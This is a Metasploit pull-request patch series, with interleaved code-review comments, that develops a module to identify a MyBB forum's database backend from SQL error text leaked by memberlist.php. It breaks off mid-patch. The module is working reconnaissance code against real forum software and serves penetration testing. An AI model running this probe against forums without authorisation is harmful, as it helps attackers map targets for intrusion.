From f9f2c401ca141216094be295ed52bf0986ce20b6 Mon Sep 17 00:00:00 2001
From: Karmanovskii
Date: Fri, 14 Feb 2014 13:12:43 -0800
Subject: [PATCH 01/16] Create myBB_GetTypeDB This exploit allows you to specify the type of database forum Mybb. Works by the operator wrongly used REGEXP. Which is not supported in postgreSQL and SQLite databases.
---
modules/exploits/multi/http/myBB_GetTypeDB | 118 +++++++++++++++++++++
1 file changed, 118 insertions(+)
create mode 100644 modules/exploits/multi/http/myBB_GetTypeDB
diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/exploits/multi/http/myBB_GetTypeDB
new file mode 100644
index 0000000000..a39fd38c09
--- /dev/null
+++ b/modules/exploits/multi/http/myBB_GetTypeDB
@@ -0,0 +1,118 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MyBB type database extractor',
+ 'Description' => %q{
+ This module exploits vulnerability in MyBB.
+ Provide type of database in forum
+ This affects versions <= 1.6.12
+ },
+ 'Author' =>
+ [
+ 'Arthur Karmanovskii', # Discovery
+ 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ '0 - days', '2014-13-02' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 13 2014'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum'])
+ ], self.class)
+ end
+
+ def check
+ begin
+ print_status("URI: #{datastore['TARGETURI']}")
+ uri = normalize_uri(target_uri.path, '/index.php')
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'headers' =>
+ {
+ 'Accept' => 'text/html, application/xhtml+xml, */*',
+ 'Accept-Language' => 'ru-RU',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'Connection' => 'Keep-Alive',
+ 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1"
+ }
+ }, 25)
+ rescue
+ print_error("Unable to connect to server.")
+ return CheckCode::Unknown
+ end
+
+ if res.code != 200
+ print_error("Unable to query to host")
+ return CheckCode::Unknown
+ end
+
+ php_version = res['X-Powered-By']
+ if php_version
+ print_good("PHP Version: #{php_version}")
+ else
+ print_status("Unknown PHP Version")
+ return CheckCode::Unknown
+ end
+
+ _Version_server = res['Server']
+ if _Version_server
+ print_good("Server Version: #{_Version_server}")
+ else
+ print_status("Unknown Server Version")
+ return CheckCode::Unknown
+ end
+ return CheckCode::Detected
+ end
+
+ def exploit
+ uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1')
+ response = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'headers' =>
+ {
+ 'Accept' => 'text/html, application/xhtml+xml, */*',
+ 'Accept-Language' => 'ru-RU',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'Connection' => 'Close',
+ 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1"
+ }
+ }, 25)
+ if response.nil?
+ fail_with(Failure::NotFound, "Failed to retrieve webpage.")
+ end
+ #Resolve response
+ if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
+ print_good("Database is: PostgreSQL ;)")
+ elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
+ print_good("Database is: SQLite ;)")
+ else response.body.match(/Member List/)
+ print_status("Database MySQL or this is not forum MyBB or unknown Database")
+ end
+
+ end
+end
+
From 81e89eadba0830ba1b88667ccbda6b2f7d725c5e Mon Sep 17 00:00:00 2001
From: Karmanovskii
Date: Wed, 19 Feb 2014 10:21:05 -0800
Subject: [PATCH 02/16] Rename modules/exploits/multi/http/myBB_GetTypeDB to modules/auxiliary/analyse/myBB_GetTypeDB.rb On the advice of "wvu-r7" moved module.
---
.../http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename modules/{exploits/multi/http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} (100%)
diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/auxiliary/analyse/myBB_GetTypeDB.rb
similarity index 100%
rename from modules/exploits/multi/http/myBB_GetTypeDB
rename to modules/auxiliary/analyse/myBB_GetTypeDB.rb
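Review bot: In `check`, `res.code` is read after the `begin`/`rescue` block without a nil test, although `exploit` in the same file guards the same call with `response.nil?`; `send_request_raw` can return nil when the host does not answer, and that raises NoMethodError instead of returning a check code. Adding `return CheckCode::Unknown if res.nil?` before `if res.code != 200` closes that path. The bare `rescue` around the request also reports every StandardError as "Unable to connect to server.", so naming the expected exception classes would keep genuine bugs visible.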
From 396ff8adaaa71eddde168f784fe851e0089190dc Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 11:33:57 -0800 Subject: [PATCH 03/16] Rename modules/auxiliary/analyse/myBB_GetTypeDB.rb to modules/auxiliary/analyze/myBB_GetTypeDB.rb Sorry again :( --- modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb (100%) diff --git a/modules/auxiliary/analyse/myBB_GetTypeDB.rb b/modules/auxiliary/analyze/myBB_GetTypeDB.rb similarity index 100% rename from modules/auxiliary/analyse/myBB_GetTypeDB.rb rename to modules/auxiliary/analyze/myBB_GetTypeDB.rb From 162527c0e4d82cfcd926fdd696575f37d47d487d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Thu, 6 Mar 2014 09:43:23 -0800 Subject: [PATCH 04/16] Update and rename modules/auxiliary/analyze/myBB_GetTypeDB.rb to modules/auxiliary/gather/myBB_GetTypeDB.rb Minor changes and bug: "Msf :: Auxiliary" - forgot to change --- .../{analyze => gather}/myBB_GetTypeDB.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename modules/auxiliary/{analyze => gather}/myBB_GetTypeDB.rb (92%) diff --git a/modules/auxiliary/analyze/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb similarity index 92% rename from modules/auxiliary/analyze/myBB_GetTypeDB.rb rename to modules/auxiliary/gather/myBB_GetTypeDB.rb index a39fd38c09..5b14a969c7 100644 --- a/modules/auxiliary/analyze/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
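Review bot: `Rank = ExcellentRanking` stays on the context line directly below the class line that now reads `class Metasploit3 < Msf::Auxiliary`; the ranking rates exploit reliability and is misleading on a module that only fingerprints a backend, so it should be dropped in the same change. The exploit-only metadata the module declares further down (`'Platform'`, `'Arch'`, `'Targets'`, `'DefaultTarget'`) deserves the same treatment. The class body continues outside this hunk.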
@@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) rescue print_error("Unable to connect to server.") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end if res.code != 200 print_error("Unable to query to host") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end php_version = res['X-Powered-By'] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("PHP Version: #{php_version}") else print_status("Unknown PHP Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end _Version_server = res['Server'] @@ -80,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Server Version: #{_Version_server}") else print_status("Unknown Server Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end - return CheckCode::Detected + return Exploit::CheckCode::Detected end - def exploit + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') response = send_request_raw( { @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Database is: PostgreSQL ;)") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("Database is: SQLite ;)") - else response.body.match(/Member List/) + else print_status("Database MySQL or this is not forum MyBB or unknown Database") end From 6d748f49d31c7524511d6501c6490236b33b812f Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 7 Mar 2014 10:49:30 -0800 Subject: [PATCH 05/16] Update myBB_GetTypeDB.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1.I added comment header; 2.I made ​​a link to your account as a comment; 3.I added a link https://github.com/rapid7/metasploit-framework/pull/3070 Items 2 and 3 on the advice wchen-r7 --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) 
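Review bot: The `Member List` test on the removed line `else response.body.match(/Member List/)` never acted as a condition, and the new bare `else` in the last hunk drops it instead of making it one, so any page without the two error strings is reported under the same message as a MySQL-backed forum. Keeping it as its own branch, `elsif response.body.match(/Member List/)`, followed by a separate `else` for "not MyBB or unknown", lets the module name MySQL only when the member list actually rendered. `run` begins and ends outside this hunk.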
diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 5b14a969c7..9106a4f746 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -15,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Arthur Karmanovskii', # Discovery - 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ '0 - days', '2014-13-02' ] + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], 'Privileged' => false, 'Platform' => ['php'], @@ -115,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary end end - From 0b51e7459c2e1730fb3c63cf16f8530a7f751bf8 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 24 Mar 2014 12:19:51 -0700 Subject: [PATCH 06/16] Update myBB_GetTypeDB.rb I have added detection MyBB forum. --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 95 ++++++++++++---------- 1 file changed, 53 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 9106a4f746..46e0a0ad9a 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -4,7 +4,6 @@ ## require 'msf/core' - class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking 
@@ -46,49 +45,61 @@ class Metasploit3 < Msf::Auxiliary def check begin - print_status("URI: #{datastore['TARGETURI']}") - uri = normalize_uri(target_uri.path, '/index.php') - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Keep-Alive', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - rescue - print_error("Unable to connect to server.") - return Exploit::CheckCode::Unknown - end - - if res.code != 200 - print_error("Unable to query to host") - return Exploit::CheckCode::Unknown - end - - php_version = res['X-Powered-By'] - if php_version - print_good("PHP Version: #{php_version}") - else - print_status("Unknown PHP Version") - return Exploit::CheckCode::Unknown - end - _Version_server = res['Server'] - if _Version_server - print_good("Server Version: #{_Version_server}") - else - print_status("Unknown Server Version") - return Exploit::CheckCode::Unknown - end - return Exploit::CheckCode::Detected + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: 
#{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + end + + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') From b11df0eaf0e095701ba185fc229aaf718b4f02f5 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 28 Mar 2014 16:47:49 -0700 Subject: [PATCH 07/16] Update and rename myBB_GetTypeDB.rb to mybb_get_type_db.rb --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 133 ------------------- modules/auxiliary/gather/mybb_get_type_db.rb | 129 ++++++++++++++++++ 2 files changed, 129 insertions(+), 133 deletions(-) delete mode 100644 modules/auxiliary/gather/myBB_GetTypeDB.rb create mode 100644 modules/auxiliary/gather/mybb_get_type_db.rb diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb deleted file mode 100644 index 46e0a0ad9a..0000000000 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ /dev/null 
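Review bot: `res = nclient.send_recv(req, 1024)` is followed directly by `res.code`, and the new `rescue RuntimeError` does not catch the NoMethodError raised when no response comes back, so an unreachable host aborts `check` instead of returning `Exploit::CheckCode::Unknown`. A guard such as `return Exploit::CheckCode::Unknown unless res` right after the call covers that case. The second argument of `send_recv` looks like a timeout in seconds rather than a byte count, which would make 1024 a wait of about 17 minutes; confirm against Rex and use a value in line with the `25` that `run` passes. Building a raw `Rex::Proto::Http::Client` also appears to bypass the SSL and virtual-host handling of the included HttpClient mixin.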
@@ -1,133 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -class Metasploit3 < Msf::Auxiliary - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MyBB type database extractor', - 'Description' => %q{ - This module exploits vulnerability in MyBB. - Provide type of database in forum - This affects versions <= 1.6.12 - }, - 'Author' => - [ - # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii ' # Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 13 2014')) - - register_options( - [ - OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) - ], self.class) - end - - def check - begin - - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end - - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return 
Exploit::CheckCode::Unknown # necessary ???? - end - - #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) - else - _Version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end - - - end - - - - def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") - end - #Resolve response - if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") - elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") - else - print_status("Database MySQL or this is not forum MyBB or unknown Database") - end - - end -end 
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb
new file mode 100644
index 0000000000..e20d863f2d
--- /dev/null
+++ b/modules/auxiliary/gather/mybb_get_type_db.rb
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Determinant Databases MyBB ',
+ 'Description' => %q{
+ Determine the database in the forum.
+ This affects versions <= 1.6.12
+ },
+ 'Author' =>
+ [
+ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
+ 'Arthur Karmanovskii '#Discovery and Metasploit Module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Automatic', { } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 13 2014'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum'])
+ ], self.class)
+ end
+
+ def check
+ begin
+ uri = normalize_uri(target_uri.path, '/index.php?intcheck=1')
+ nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'],
+ {
+ 'Msf' => framework,
+ 'MsfExploit' => self,
+ })
+ req = nclient.request_raw({
+ 'uri' => uri,
+ 'method' => 'GET',})
+ if (req)
+ res = nclient.send_recv(req, 1024)
+ else
+ print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.")
+ return Exploit::CheckCode::Unknown
+ end
+ if res.code != 200
+ print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).")
+ return Exploit::CheckCode::Unknown
+ end
+
+ #Check PhP
+ php_version = res['X-Powered-By']
+ if php_version
+ php_version = " PHP Version: #{php_version}".ljust(40)
+ else
+ php_version = " PHP Version: unknown".ljust(40)
+ #return Exploit::CheckCode::Unknown # necessary ????
+ end
+
+ #Check Web-Server
+ _Version_server = res['Server']
+ if _Version_server
+ _Version_server = " Server Version: #{_Version_server}".ljust(40)
+ else
+ _Version_server = " Server Version: unknown".ljust(40)
+ end
+
+ #Check forum MyBB
+ if res.body.match("MYBB")
+ print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server)
+ return Exploit::CheckCode::Detected
+ else
+ print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server)
+ return Exploit::CheckCode::Unknown
+ end
+ rescue RuntimeError => err
+ print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}")
+ return Exploit::CheckCode::Unknown
+ end
+
+
+ end
+
+
+ def run
+ uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1')
+ response = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'headers' =>
+ {
+ 'Accept' => 'text/html, application/xhtml+xml, */*',
+ 'Accept-Language' => 'ru-RU',
+ 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'Connection' => 'Close',
+ 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1"
+ }
+ }, 25)
+ if response.nil?
+ fail_with(Failure::NotFound, "Failed to retrieve webpage.")
+ end
+
+ #Resolve response
+ if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
+ print_good("Database is: PostgreSQL ;)")
+ elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
+ print_good("Database is: SQLite ;)")
+ else
+ print_status("Database MySQL or this is not forum MyBB or unknown Database")
+ end
+ end
+end
From c035715a711f507b5895f429c60a3a6f7f88fc8c Mon Sep 17 00:00:00 2001
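Review bot: The `'Description'` of the new file gives only "Determine the database in the forum" and a version bound; it does not say that the answer is inferred from SQL error text in the `memberlist.php` response, nor that MySQL is reported by elimination in the final `else` of `run`. A description such as `Identifies the database backend of a MyBB forum from the SQL error text returned by memberlist.php; PostgreSQL and SQLite are recognised by their error output, MySQL is assumed when no error appears.` tells an operator what a negative result means and tells a forum administrator that hiding database errors from visitors removes the signal. `'Name' => 'Determinant Databases MyBB '` also carries a trailing space inside the string.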
From: Karmanovskii Date: Sat, 5 Apr 2014 02:50:53 -0700 Subject: [PATCH 08/16] Update mybb_get_type_db.rb Changed the name of the variable _Version_server on _version_server according to the recommendation of jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e20d863f2d..58d01b6d58 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -73,19 +73,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = res['Server'] + if _version_server + _version_server = " Server Version: #{_Version_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + _version_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err From 5dbd124ef9440ae72923fb817d47184b8639c536 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:53:43 -0700 Subject: [PATCH 09/16] Update mybb_get_type_db.rb --- modules/auxiliary/gather/mybb_get_type_db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
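Review bot: The rename is incomplete: the added line `_version_server = " Server Version: #{_Version_server}".ljust(40)` still interpolates the old name, which is no longer assigned anywhere in the hunk, so a response carrying a `Server` header raises NameError. The line should read `_version_server = " Server Version: #{_version_server}".ljust(40)`. The `rescue RuntimeError => err` visible at the end of the hunk does not cover NameError, so the exception would leave `check` instead of producing `Exploit::CheckCode::Unknown`.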
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index 58d01b6d58..ad1e413cab 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary #Check Web-Server _version_server = res['Server'] if _version_server - _version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = " Server Version: #{_version_server}".ljust(40) else _version_server = " Server Version: unknown".ljust(40) end From cbb84e854ca35f66b5b199a63fdedfc52b1d4e9d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 14 May 2014 14:56:40 +0400 Subject: [PATCH 10/16] Update mybb_get_type_db.rb 14.05.2014 Eliminated notes jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 143 +++++++++---------- 1 file changed, 69 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index ad1e413cab..a61c1166d1 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb 
@@ -12,27 +12,19 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + Determine the database in the forum. + This affects versions <= 1.6.12 }, 'Author' => [ - #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 13 2014')) register_options( 
@@ -43,78 +35,81 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_cgi({ + 'uri' => uri, + 'method' => 'GET',}) + if req.nil? + print_error("Failed to retrieve webpage.") + return Exploit::CheckCode::Unknown + end + if req + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: 